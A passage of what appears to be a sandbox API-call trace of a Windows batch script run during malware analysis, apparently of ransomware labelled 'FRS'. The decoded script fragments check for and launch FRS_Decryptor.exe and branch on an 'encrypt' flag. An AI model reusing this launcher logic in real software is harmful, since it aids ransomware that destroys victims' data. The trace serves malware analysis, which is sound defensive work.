0xffffffff [0099.384] GetLastError () returned 0x2 [0099.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.384] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0099.385] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0099.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0099.385] GetLastError () returned 0x2 [0099.385] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0099.385] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0099.385] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0099.385] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0099.385] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0099.385] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.386] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.386] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0099.386] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x260, dwProcessId=0xaa8, dwThreadId=0x4c0)) returned 1 [0099.389] CloseHandle (hObject=0x260) returned 1 [0099.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.389] GetEnvironmentStringsW () returned 0xd30508* [0099.389] FreeEnvironmentStringsA (penv="=") returned 1 [0099.389] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0101.455] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0101.455] CloseHandle (hObject=0x36c) returned 1 [0101.455] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0101.455] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0101.455] GetEnvironmentStringsW () returned 0xd7e510* [0101.455] FreeEnvironmentStringsA (penv="=") returned 1 [0101.455] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0101.455] GetEnvironmentStringsW () returned 0xd30508* [0101.455] FreeEnvironmentStringsA (penv="=") returned 1 [0101.455] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0101.455] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0101.455] _close (_FileHandle=3) returned 0 [0101.455] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.455] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0101.456] _get_osfhandle (_FileHandle=1) returned 0x28 [0101.456] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0101.456] _get_osfhandle (_FileHandle=0) returned 0x24 [0101.456] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0101.456] SetConsoleInputExeNameW () returned 0x1 [0101.456] GetConsoleOutputCP () returned 0x1b5 [0101.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0101.456] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.456] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0101.457] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0101.457] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0101.457] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0101.457] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0101.457] GetFileType (hFile=0x2b8) returned 0x1 [0101.457] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0101.457] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0101.457] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0101.457] GetFileType (hFile=0x2b8) returned 0x1 [0101.457] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0101.457] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0101.458] _tell (_FileHandle=3) returned 2627 [0101.458] _close (_FileHandle=3) returned 0 [0101.458] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0101.458] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0101.458] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0101.458] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0101.458] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0101.461] feof (_File=0x76ea4c68) returned 0 [0101.461] ferror (_File=0x76ea4c68) returned 0 [0101.461] fgets (in: _Buf=0xd819f8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0101.926] feof (_File=0x76ea4c68) returned 0 [0101.926] ferror (_File=0x76ea4c68) returned 0 [0101.926] fgets (in: _Buf=0xd8525e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0101.965] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0101.965] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd43466, cbMultiByte=78, lpWideCharStr=0xd43418, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0101.965] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0101.965] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.966] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0101.966] _open_osfhandle (_OSFileHandle=0x158, _Flags=8) returned 3 [0101.966] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.966] SetFilePointer (in: hFile=0x158, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0101.966] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.966] GetFileSize (in: hFile=0x158, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0101.966] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0101.966] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.966] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0101.966] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.966] GetFileType (hFile=0x158) returned 0x1 [0101.966] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0101.966] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0101.966] SetFilePointer (in: hFile=0x158, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0101.966] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0101.966] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0101.966] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.966] GetFileType (hFile=0x158) returned 0x1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0101.967] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0101.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0101.967] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.967] GetFileType (hFile=0x158) returned 0x1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0101.967] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.967] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.967] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.967] GetFileType (hFile=0x158) returned 0x1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.967] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0101.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0101.967] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.967] GetFileType (hFile=0x158) returned 0x1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0101.967] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0101.967] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0101.967] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0101.967] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.968] GetFileType (hFile=0x158) returned 0x1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0101.968] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0101.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0101.968] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.968] GetFileType (hFile=0x158) returned 0x1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0101.968] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0101.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0101.968] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.968] GetFileType (hFile=0x158) returned 0x1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0101.968] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0101.968] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0101.968] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.968] GetFileType (hFile=0x158) returned 0x1 [0101.968] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0101.969] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0101.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0101.969] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.969] GetFileType (hFile=0x158) returned 0x1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0101.969] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0101.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0101.969] _get_osfhandle (_FileHandle=3) returned 0x158 [0101.969] GetFileType (hFile=0x158) returned 0x1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0101.969] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0101.969] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0101.969] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, 